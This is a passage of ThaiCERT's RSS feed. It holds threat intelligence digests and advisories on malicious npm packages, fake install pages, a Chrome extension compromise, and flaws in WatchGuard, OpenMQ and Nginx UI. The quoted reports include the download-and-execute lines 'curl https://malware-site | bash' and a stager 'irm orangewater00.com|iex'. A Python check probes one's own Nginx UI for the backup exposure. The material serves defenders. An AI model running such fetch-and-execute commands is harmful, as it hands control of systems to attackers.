"Huntress discovered a threat actor was exploiting vulnerabilities (like SolarWinds Web Help Desk) and exfiltrating victim data to a free trial instance of Elastic Cloud SIEM. The actor used the SIEM for victim triage, and the infrastructure revealed details about their campaign, including disposable email services (<a href="http://quieresmail.com" target="_blank" rel="noopener noreferrer nofollow ugc">quieresmail.com</a>), connections to a Russian-registered temporary email network (firstmail.ltd), use of a SAFING_VPN tunnel, and a possible connection to other opportunistic attacks against Microsoft SharePoint and other software. The instance has since been taken down."<br />
<a href="https://www.huntress.com/blog/threat-actor-abuses-elastic-cloud-siem" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.huntress.com/blog/threat-actor-abuses-elastic-cloud-siem</a><br />
<a href="https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/</a></li>
<li><strong>Fake Claude Code Install Pages Hit Windows And Mac Users With Infostealers</strong><br />
"Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like <code>curl https://malware-site | bash</code> into your terminal and hit Enter. That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator."<br />
<a href="https://www.malwarebytes.com/blog/news/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.malwarebytes.com/blog/news/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers</a></li>
<li><strong>Quiz Sites Trick Users Into Enabling Unwanted Browser Notifications</strong><br />
"Our support team flagged a number of customers who suspected their device might be infected with malware, but Malwarebytes scans came up empty. When the customers provided screenshots, our Malware Removal Support team quickly recognized the format as web push notifications. The reason the scans came up clean is that these notifications aren’t malware on the device. They’re browser notifications from websites that trick users into clicking “Allow.”"<br />
<a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications</a></li>
<li><strong>GhostClaw Unmasked: A Malicious Npm Package Impersonating OpenClaw To Steal Everything</strong><br />
"The JFrog Security research team has identified a live malicious npm package named @openclaw-ai/openclawai. This package masquerades as a legitimate CLI tool called "OpenClaw Installer" while deploying a multi-stage infection chain that steals system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, iMessage history, and more - then installs a persistent RAT with full remote access capabilities including a SOCKS5 proxy and live browser session cloning. The attack is notable for its broad data collection, its use of social engineering to harvest the victim's system password, and the sophistication of its persistence and C2 infrastructure. Internally, the malware identifies itself as GhostLoader."<br />
<a href="https://research.jfrog.com/post/ghostclaw-unmasked/" target="_blank" rel="noopener noreferrer nofollow ugc">https://research.jfrog.com/post/ghostclaw-unmasked/</a><br />
<a href="https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html</a></li>
<li><strong>From a Sophisticated Browser-Extension Supply-Chain Compromise To a VibeCoded Twist: A Chrome Extension As The Initial Access Vector For a Broader Malware Chain</strong><br />
"A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data. In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe, a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell 4104 logs later confirmed execution of the decoded stager irm orangewater00.com|iex and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic. In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability."<br />
<a href="https://monxresearch-sec.github.io/shotbird-extension-malware-report/" target="_blank" rel="noopener noreferrer nofollow ugc">https://monxresearch-sec.github.io/shotbird-extension-malware-report/</a><br />
<a href="https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html</a></li>
</ul>
<p dir="auto"><strong>Breaches/Hacks/Leaks</strong></p>
<ul>
<li><strong>Ericsson US Discloses Data Breach After Service Provider Hack</strong><br />
"Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers. Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide. In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025."<br />
<a href="https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/</a></li>
<li><strong>EV Charger Biz ELECQ Zapped By Ransomware Crooks, Customer Contact Data Stolen</strong><br />
"ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems. In a notice sent to customers on Monday and seen by The Register, the EV charging outfit said that it detected "unusual activity" on its AWS cloud platform on March 7 and quickly discovered that attackers had launched a ransomware attack against parts of its infrastructure."<br />
<a href="https://www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/</a></li>
</ul>
<p dir="auto"><strong>General News</strong></p>
<ul>
<li><strong>Google: Cloud Attacks Exploit Flaws More Than Weak Credentials</strong><br />
"Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days. At the same time, the use of weak credentials or misconfigurations has dropped significantly in the second half of 2025, Google notes in a report highlighting the trends on threats to cloud users. According to the report, incident responders determined that bug exploits were the primary access vector in 44.5% of the investigated intrusions, while credentials were responsible for 27% of the breaches."<br />
<a href="https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/</a><br />
<a href="https://services.google.com/fh/files/misc/cloud_threat_horizons_report_h12026.pdf" target="_blank" rel="noopener noreferrer nofollow ugc">https://services.google.com/fh/files/misc/cloud_threat_horizons_report_h12026.pdf</a></li>
<li><strong>Dutch Govt Warns Of Signal, WhatsApp Account Hijacking Attacks</strong><br />
"Russian state-sponsored hackers have been linked to an ongoing Signal and WhatsApp phishing campaign targeting government officials, military personnel, and journalists to gain access to sensitive messages. This report comes from the Netherlands Defence Intelligence and Security Service (MIVD) and the Netherlands General Intelligence and Security Service (AIVD), who confirmed that Dutch government employees have been targeted in the attacks. The Dutch intelligence agencies say the operation relies on phishing and social-engineering techniques that abuse legitimate authentication features to take over accounts and covertly monitor new messages."<br />
<a href="https://www.bleepingcomputer.com/news/security/dutch-govt-warns-of-signal-whatsapp-account-hijacking-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/dutch-govt-warns-of-signal-whatsapp-account-hijacking-attacks/</a><br />
<a href="https://therecord.media/russian-hackers-target-signal-whatsapp-warn-dutch-intelligence-agencies" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/russian-hackers-target-signal-whatsapp-warn-dutch-intelligence-agencies</a><br />
<a href="https://hackread.com/dutch-intel-russia-hackers-hijack-signal-whatsapp-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/dutch-intel-russia-hackers-hijack-signal-whatsapp-attacks/</a><br />
<a href="https://securityaffairs.com/189156/intelligence/russia-linked-hackers-target-signal-whatsapp-of-officials-globally.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189156/intelligence/russia-linked-hackers-target-signal-whatsapp-of-officials-globally.html</a><br />
<a href="https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/09/signal-whatsapp-accounts-russian-hackers/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/09/signal-whatsapp-accounts-russian-hackers/</a></li>
<li><strong>Are We Ready For Auto Remediation With Agentic AI?</strong><br />
"The key to security program effectiveness is optimizing remediation. This has become increasingly difficult as organizations strive to modernize their processes with innovative technologies, including artificial intelligence (AI). As employees gain capabilities to collaborate and work faster, cyber assets and attack surfaces proliferate, making it difficult for security teams to take the needed actions to mitigate risk. Now, as organizations look to leverage agentic AI in areas such as software development, instead of incrementally increasing productivity, we are expecting exponential gains in productivity, further proliferating attack surfaces. At the same time, the threat landscape will also evolve rapidly, with attackers taking advantage of AI to scale their attacks."<br />
<a href="https://www.darkreading.com/application-security/auto-remediation-agentic-ai" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/application-security/auto-remediation-agentic-ai</a></li>
<li><strong>More AI Tools, More Burnout! New Research Explains Why</strong><br />
"Workflows built around multiple AI agents and constant tool switching are adding cognitive strain across large enterprises. A recent Harvard Business Review analysis describes this pattern as “AI brain fry,” a form of mental fatigue tied to intensive use and oversight of AI systems. Employees increasingly manage clusters of agents that generate code, synthesize information, and produce drafts at high speed. Performance systems in some organizations reward activity metrics such as token consumption and AI output volume. This structure pushes workers to monitor more systems and outcomes within the same workday."<br />
<a href="https://www.helpnetsecurity.com/2026/03/09/harvard-business-review-ai-workplace-fatigue-report/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/09/harvard-business-review-ai-workplace-fatigue-report/</a></li>
<li><strong>Ghanaian Pleads Guilty To Role In $100m Romance Scam</strong><br />
"A Ghanaian national has pleaded guilty to scamming countless victims as part of a global fraud ring that engaged in romance fraud and business email compromise (BEC). The Justice Department announced the guilty plea for Derrick Van Yeboah, 40, late last week. The fraud operation, which was primarily based in Ghana, is said to have caused over $100m in losses, 10% of which were pinned on Van Yeboah. As per typical scams of this kind, he impersonated romantic partners in online communications with vulnerable victims."<br />
<a href="https://www.infosecurity-magazine.com/news/ghanaian-pleads-guilty-100m/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/ghanaian-pleads-guilty-100m/</a></li>
<li><strong>Cloud Threat Horizons Report H1 2026</strong><br />
"The Google Cloud Threat Horizons Report provides decision-makers with strategic intelligence on threats to not just Google Cloud, but all cloud service providers. The report focuses on recommendations for mitigating risks and improving cloud security for leaders and practitioners. The report is informed by Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and various Google Cloud intelligence, security, and product teams."<br />
<a href="https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026" target="_blank" rel="noopener noreferrer nofollow ugc">https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026</a><br />
<a href="https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html</a></li>
<li><strong>White House Cyber Strategy Prioritizes Offense</strong><br />
"The Trump administration released a notably hawkish vision of American cyber power that blends deregulation at home with deterrence and offense against adversaries abroad. In a relatively brief seven-page document published on Friday, President Trump's Cyber Strategy for America framed cybersecurity both as a defensive IT challenge and as a strategic domain where the US must assert dominance amid intensifying geopolitical rivalries. American response to cyber threats will not be confined to the cyber realm, the document warned."<br />
<a href="https://www.darkreading.com/cybersecurity-operations/white-house-cyber-strategy-prioritizes-offense" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/cybersecurity-operations/white-house-cyber-strategy-prioritizes-offense</a><br />
<a href="https://www.whitehouse.gov/wp-content/uploads/2026/03/President-Trumps-Cyber-Strategy-for-America.pdf" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.whitehouse.gov/wp-content/uploads/2026/03/President-Trumps-Cyber-Strategy-for-America.pdf</a><br />
<a href="https://therecord.media/trump-cyber-strategy-released-regulations" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/trump-cyber-strategy-released-regulations</a><br />
<a href="https://www.bankinfosecurity.com/trump-pledges-action-on-cybercrime-cyberspace-threats-a-30942" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/trump-pledges-action-on-cybercrime-cyberspace-threats-a-30942</a><br />
<a href="https://www.infosecurity-magazine.com/news/usa-unveils-new-cyber-strategy/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/usa-unveils-new-cyber-strategy/</a><br />
<a href="https://www.securityweek.com/us-cyber-strategy-targets-adversaries-critical-infrastructure-and-emerging-technologies/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/us-cyber-strategy-targets-adversaries-critical-infrastructure-and-emerging-technologies/</a></li>
</ul>
<p dir="auto"><strong>References</strong><br />
Electronic Transactions Development Agency (ETDA) <img src="/assets/uploads/files/1773133721151-6337f8a0-8b97-4059-b4cc-4dfda0bfa3ce-image.png" alt="6337f8a0-8b97-4059-b4cc-4dfda0bfa3ce-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2682/cyber-threat-intelligence-10-march-2026</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2682/cyber-threat-intelligence-10-march-2026</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Tue, 10 Mar 2026 09:08:42 GMT</pubDate></item><item><title><![CDATA[🚨Warning! Phishing attacks via Microsoft Teams observed installing malware]]></title><description><![CDATA[<p dir="auto">The National Computer Security Coordination Center (ThaiCERT), while monitoring the cyber threat landscape, found a report of a cyber threat in which attackers use social engineering over Microsoft Teams chat to open a remote-access channel to the victim's computer, after which they install a backdoor malware called A0Backdoor.</p>
<ol>
<li>
<p dir="auto">Incident details<br />
• The attacker sends a large volume of spam email to the victim to create the impression that the victim's email system has a problem, then contacts the victim via Microsoft Teams posing as IT staff in order to open a remote-access channel to the computer.</p>
</li>
<li>
<p dir="auto">Attack behaviour<br />
• The attacker sends a large volume of spam email to the victim to create the impression that the victim's email system has a problem, then contacts the victim via Microsoft Teams posing as IT staff.<br />
• The victim is tricked into launching Quick Assist so that the attacker can take control of the machine.<br />
• After gaining control of the machine, the attacker installs a malicious MSI file hosted on Microsoft cloud storage under the attacker's personal account.<br />
• The file masquerades as a component of Microsoft Teams and of CrossDeviceService, a Windows tool.<br />
• Once installed, the A0Backdoor malware gives the attacker a channel to control the system.</p>
</li>
<li>
<p dir="auto">Prevention and risk reduction<br />
• Set a policy restricting contact from Microsoft Teams accounts outside the organization.<br />
• Avoid enabling Quick Assist or other remote access.<br />
• Monitor and audit installations of MSI files or unauthorized programs.<br />
• Restrict software installation rights for ordinary users.<br />
• Use Endpoint Detection and Response (EDR) or another threat detection system to watch for anomalous behaviour.</p>
</li>
<li>
<p dir="auto">References<br />
• <a href="https://dg.th/ty86mhid20" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/ty86mhid20</a></p>
</li>
</ol>
<p dir="auto">If anyone contacts you via Microsoft Teams claiming to be IT staff, always verify their identity through the organization's internal channels first.</p>
<p dir="auto"><img src="/assets/uploads/files/1773132436130-microsoft-teams-resized.png" alt="Microsoft Teams.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2681/เต-อน-พบการโจมต-แบบฟ-ชช-งผ-าน-microsoft-teams-เพ-อต-ดต-งม-ลแวร</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2681/เต-อน-พบการโจมต-แบบฟ-ชช-งผ-าน-microsoft-teams-เพ-อต-ดต-งม-ลแวร</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Tue, 10 Mar 2026 08:47:17 GMT</pubDate></item><item><title><![CDATA[Urgent! Patched yet? WatchGuard releases an update fixing a critical vulnerability in Fireware OS]]></title><description><![CDATA[<p dir="auto"><img src="https://webboard-nsoc.ncsa.or.th/assets/plugins/nodebb-plugin-emoji/emoji/android/26a0.png?v=3db0bp1b09r" class="not-responsive emoji emoji-android emoji--warning" style="height:23px;width:auto;vertical-align:middle" title=":warning:" alt="⚠" /> ThaiCERT has been monitoring the cyber threat landscape and found a security advisory from WatchGuard regarding CVE-2026-3342, an Out-of-bounds Write vulnerability in WatchGuard Fireware OS. It may allow an authenticated attacker holding privileged administrator rights to use an exposed management interface to execute code with root privileges on affected devices, creating a high risk of device takeover or tampering with the device's security configuration.</p>
<ol>
<li>
<p dir="auto">Vulnerability details<br />
CVE-2026-3342 - Out-of-bounds Write in WatchGuard Fireware OS (CVSS v3.1: 7.2)<br />
The vulnerability stems from a write beyond the bounds of a memory buffer and may allow an already-authenticated administrator to execute arbitrary code with root permissions via an exposed management interface.</p>
</li>
<li>
<p dir="auto">Affected products</p>
</li>
</ol>
<ul>
<li>Fireware OS 11.9 to 11.12.4_Update1</li>
<li>Fireware OS 12.0 to 12.11.7</li>
<li>Fireware OS 2025.1 to 2026.1.1</li>
</ul>
<ol start="3">
<li>Remediation</li>
</ol>
<ul>
<li>Update to Fireware OS 2026.1.2</li>
<li>Update to Fireware OS 12.11.8</li>
<li>For Fireware OS 12.5.x (T15 &amp; T35 models), update to 12.5.17</li>
<li>Fireware OS 11.x has been declared End of Life by the vendor, so plan an upgrade or replacement as soon as possible.</li>
</ul>
<ol start="4">
<li>
<p dir="auto">If you cannot update yet<br />
There is no workaround for this vulnerability; apply the update as a matter of urgency.</p>
</li>
<li>
<p dir="auto">References</p>
</li>
</ol>
<ul>
<li><a href="https://dg.th/m3bh0e9pfd" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/m3bh0e9pfd</a></li>
<li><a href="https://dg.th/ehtnqcjbpk" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/ehtnqcjbpk</a></li>
</ul>
<p dir="auto"><img src="/assets/uploads/files/1773041391603-watchguard12-resized.png" alt="WatchGuard12.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2680/ด-วน-patch-หร-อย-ง-watchguard-ออกอ-ปเดตแก-ช-องโหว-ร-ายแรงใน-fireware-os</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2680/ด-วน-patch-หร-อย-ง-watchguard-ออกอ-ปเดตแก-ช-องโหว-ร-ายแรงใน-fireware-os</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Mon, 09 Mar 2026 07:29:54 GMT</pubDate></item><item><title><![CDATA[Urgent! Vulnerability alert for Eclipse OpenMQ]]></title><description><![CDATA[<p dir="auto"><img src="https://webboard-nsoc.ncsa.or.th/assets/plugins/nodebb-plugin-emoji/emoji/android/26a0.png?v=3db0bp1b09r" class="not-responsive emoji emoji-android emoji--warning" style="height:23px;width:auto;vertical-align:middle" title=":warning:" alt="⚠" /> ThaiCERT has been monitoring the cyber threat landscape and found a security advisory regarding CVE-2026-22886, which affects Eclipse OpenMQ. The issue is the use of default credentials in the TCP-based management service imqbrokerd: an attacker who can reach the service's port can log in with the default administrator account admin/admin and take full control of the system's administrative capabilities.</p>
<ol>
<li>
<p dir="auto">Vulnerability details<br />
CVE-2026-22886 - Use of Default Credentials / Default Password (CVSS v3.1: 9.8)<br />
The vulnerability arises because the system ships with a default administrator account and does not force a password change on first use, so the default password remains valid indefinitely. An attacker who can reach the imqbrokerd service port can authenticate as administrator and take control of the broker's management functions.</p>
</li>
<li>
<p dir="auto">Affected products<br />
All versions of Eclipse OpenMQ</p>
</li>
<li>
<p dir="auto">Remediation</p>
</li>
</ol>
<ul>
<li>Change the default password of Eclipse OpenMQ</li>
</ul>
<ol start="4">
<li>Risk mitigation</li>
</ol>
<ul>
<li>Check immediately whether the imqbrokerd service is enabled</li>
<li>Disable the service if it is not needed</li>
<li>If it must be used, immediately change the default administrator password to a strong, unique one</li>
<li>Restrict access to the port to authorized administrators only</li>
</ul>
<ol start="5">
<li>References</li>
</ol>
<ul>
<li><a href="https://dg.th/1vxqlprwea" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/1vxqlprwea</a></li>
<li><a href="https://dg.th/fsydbjm0rh" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/fsydbjm0rh</a></li>
</ul>
<p dir="auto"><img src="/assets/uploads/files/1773041334181-eclipse-openmq-resized.png" alt="Eclipse OpenMQ.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2679/ด-วน-แจ-งเต-อนช-องโหว-ใน-eclipse-openmq</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2679/ด-วน-แจ-งเต-อนช-องโหว-ใน-eclipse-openmq</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Mon, 09 Mar 2026 07:28:58 GMT</pubDate></item><item><title><![CDATA[Cyber Threat Intelligence 09 March 2026]]></title><description><![CDATA[<p dir="auto"><strong>Industrial Sector</strong></p>
<ul>
<li><strong>APT And Financial Attacks On Industrial Organizations In Q4 2025</strong><br />
"In the last quarter of 2025, information security researchers published numerous interesting reports on attacks against industrial organizations. Most of them highlight the persistence of long-standing problems: untimely installation of security updates, including on internet-accessible systems; insecure provision of remote access to internal systems; the difficulty of monitoring the security of trusted partners and suppliers; the inability to guarantee 100% protection for traditional operating systems with their inherent information security issues (DLL hijacking, BYOVD, and malware); and the lack of staff preparedness to resist basic social engineering techniques."<br />
<a href="https://ics-cert.kaspersky.com/publications/reports/2026/03/06/apt-and-financial-attacks-on-industrial-organizations-in-q4-2025/" target="_blank" rel="noopener noreferrer nofollow ugc">https://ics-cert.kaspersky.com/publications/reports/2026/03/06/apt-and-financial-attacks-on-industrial-organizations-in-q4-2025/</a></li>
</ul>
<p dir="auto"><strong>New Tooling</strong></p>
<ul>
<li><strong>Codex Security: Now In Research Preview</strong><br />
"Today we’re introducing Codex Security, our application security agent. It builds deep context about your project to identify complex vulnerabilities that other agentic tools miss, surfacing higher-confidence findings with fixes that meaningfully improve the security of your system while sparing you from the noise of insignificant bugs."<br />
<a href="https://openai.com/index/codex-security-now-in-research-preview/" target="_blank" rel="noopener noreferrer nofollow ugc">https://openai.com/index/codex-security-now-in-research-preview/</a><br />
<a href="https://thehackernews.com/2026/03/openai-codex-security-scanned-12.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/openai-codex-security-scanned-12.html</a></li>
</ul>
<p dir="auto"><strong>Vulnerabilities</strong></p>
<ul>
<li><strong>Critical Nginx UI Flaw CVE-2026-27944 Exposes Server Backups</strong><br />
"A critical vulnerability in Nginx UI, tracked as CVE-2026-27944 (CVSS score of 9.8), allows attackers to download and decrypt full server backups without authentication. The flaw poses a serious risk to organizations exposing the management interface, potentially revealing sensitive configuration data, credentials, and encryption keys. “The /api/backup endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the X-Backup-Security response header.” reads the advisory. “This allows an unauthenticated attacker to download a full system backup containing sensitive data (user credentials, session tokens, SSL private keys, Nginx configurations) and decrypt it immediately.”"<br />
<a href="https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html</a><br />
<a href="https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762" target="_blank" rel="noopener noreferrer nofollow ugc">https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762</a></li>
<li><strong>Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited</strong><br />
"Exposure management company WatchTowr reports that a recent Cisco Catalyst SD-WAN vulnerability, initially exploited as a zero-day, is now being used more frequently by threat actors. The in-the-wild exploitation of four Cisco Catalyst SD-WAN vulnerabilities came to light in recent weeks. One of them is CVE-2026-20127, which had been exploited as a zero-day in combination with an older vulnerability, CVE-2022-20775, to bypass authentication, escalate privileges, and establish persistence on systems."<br />
<a href="https://www.securityweek.com/recent-cisco-catalyst-sd-wan-vulnerability-now-widely-exploited/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/recent-cisco-catalyst-sd-wan-vulnerability-now-widely-exploited/</a></li>
</ul>
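<p dir="auto">The advisory excerpt above names the two things that make CVE-2026-27944 exploitable without credentials: the /api/backup endpoint answers anonymous requests, and the X-Backup-Security response header carries the key needed to decrypt what it returns. The Python script below is an added self-assessment example, not code from the Nginx UI project or from the advisory. It issues one anonymous GET against an instance you operate, never reads the body, and reports whether the endpoint refuses unauthenticated callers. Only the path and header name come from the advisory; the classification rules and the placeholder hostname are assumptions of this example.</p>

```python
"""Self-check for the unauthenticated /api/backup exposure described in the CVE-2026-27944 advisory.

Added example, not code from the Nginx UI project. Only the endpoint path and the header
name come from the advisory text; the classification rules below are this example's own.
"""
import sys
import urllib.error
import urllib.request

BACKUP_PATH = "/api/backup"        # endpoint named in the advisory
KEY_HEADER = "X-Backup-Security"   # response header the advisory says carries the decryption key


def classify(status, headers):
    """Classify one unauthenticated response to GET /api/backup.

    headers is any mapping of header name to value; lookup is case-insensitive
    because servers and proxies rewrite header casing freely.
    """
    names = {name.lower() for name in headers}
    if status == 200 and KEY_HEADER.lower() in names:
        return "VULNERABLE: backup served anonymously and key material present in %s" % KEY_HEADER
    if status == 200:
        return "EXPOSED: backup served anonymously (no key header seen; inspect the response manually)"
    if status in (401, 403):
        return "OK: endpoint rejects anonymous requests"
    if status == 404:
        return "OK: endpoint absent (different version or path prefix; confirm before relying on it)"
    return "UNKNOWN: HTTP %d, review manually" % status


def probe(base_url, timeout=5.0):
    """Send a single anonymous GET to the live instance and classify the result.

    The body is never read, so a vulnerable server is not asked to stream the
    whole archive; only the status line and headers are used.
    """
    request = urllib.request.Request(base_url.rstrip("/") + BACKUP_PATH, method="GET")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return classify(response.status, dict(response.headers.items()))
    except urllib.error.HTTPError as error:
        # 401/403/404 arrive here; the error object still carries status and headers
        return classify(error.code, dict(error.headers.items()))


if __name__ == "__main__":
    # hostnames on the command line are yours to choose; point this only at instances you operate
    for url in sys.argv[1:]:
        print(url, "->", probe(url))
```

<p dir="auto">Run it as <code>python3 check_nginx_ui_backup.py https://nginx-ui.example.internal</code> (the hostname is a placeholder). A VULNERABLE or EXPOSED result means the management interface should be taken off the network until the fixed release is installed, and, because the advisory lists user credentials, session tokens and SSL private keys among the backup contents, those secrets should be rotated if the interface was reachable from an untrusted network.</p>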
<p dir="auto"><strong>Malware</strong></p>
<ul>
<li><strong>InstallFix: How Attackers Are Weaponizing Malvertized Install Guides</strong><br />
"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system. But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions."<br />
<a href="https://pushsecurity.com/blog/installfix/" target="_blank" rel="noopener noreferrer nofollow ugc">https://pushsecurity.com/blog/installfix/</a><br />
<a href="https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/</a></li>
<li><strong>Cyberattacks And Unpredictable Targeting Remain An Iran Risk</strong><br />
"Cyberattacks launched by Iranian nation-state hackers in reprisal for what the United States has codenamed Operation Epic Fury so far have been evident mainly in their absence. Whether the regime's military or intelligence forces have the inclination or ability to launch such attacks isn't clear. The country continues to operate in a near-total internet blackout initiated for reasons unknown at the start of hostilities by the United States and Israel on Feb. 28, monitoring firm Netblocks reported early Friday."<br />
<a href="https://www.bankinfosecurity.com/cyberattacks-unpredictable-targeting-remain-iran-risk-a-30930" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/cyberattacks-unpredictable-targeting-remain-iran-risk-a-30930</a></li>
<li><strong>AI As Tradecraft: How Threat Actors Operationalize AI</strong><br />
"Threat actors are operationalizing AI along the cyberattack lifecycle to accelerate tradecraft, abusing both intended model capabilities and jailbreaking techniques to bypass safeguards and perform malicious activity. As enterprises integrate AI to improve efficiency and productivity, threat actors are adopting the same technologies as operational enablers, embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations."<br />
<a href="https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/</a><br />
<a href="https://www.darkreading.com/threat-intelligence/north-korean-apts-ai-it-worker-scams" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/threat-intelligence/north-korean-apts-ai-it-worker-scams</a><br />
